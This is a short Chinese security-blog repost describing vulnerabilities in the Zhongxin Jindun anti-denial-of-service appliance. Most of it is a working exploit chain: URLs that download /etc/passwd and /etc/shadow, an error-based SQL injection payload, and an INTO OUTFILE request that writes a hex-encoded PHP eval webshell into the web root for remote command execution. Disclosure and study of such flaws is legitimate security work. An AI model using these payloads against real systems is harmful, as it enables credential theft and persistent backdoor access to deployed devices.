中新金盾抗拒绝服务系统GetShell漏洞

没穿底裤 2020年1月1日05:15:01评论503 views字数 662阅读2分12秒阅读模式
摘要

任意文件下载漏洞:https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd


漏洞作者: Tea

任意文件下载漏洞:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/passwd

https://1.1.1.1:28XX3/cgi-bin/index.php?t=service&c=download&filepath=/etc/shadow

中新金盾抗拒绝服务系统GetShell漏洞

SQL注入漏洞(数量不少,其他文件用的addslashes()呢?咋不用了。):

攻击分析菜单里面的列表-->

查询主机,都存在注入,这里只列一个。

POC:

'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

中新金盾抗拒绝服务系统GetShell漏洞

中新金盾抗拒绝服务系统GetShell漏洞

GetWebshell:

首先通过下载任意文件漏洞下载源码文件,获得Web路径:

/xxx/usx/XXXx/

再通过SQL注入导出文件到WEB目录:

https://1.1.1.1:28XX3/cgi-bin/index.php?t=analysis_attack&c=getAttDetailById&_=1119844506390&o=json&id=-54' Union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e,2,3,4 from mysql.user into outfile '/xxx/usx/XXXx/z.php'%23

中新金盾抗拒绝服务系统GetShell漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日05:15:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   中新金盾抗拒绝服务系统GetShell漏洞https://cn-sec.com/archives/75652.html

发表评论

匿名网友 填写信息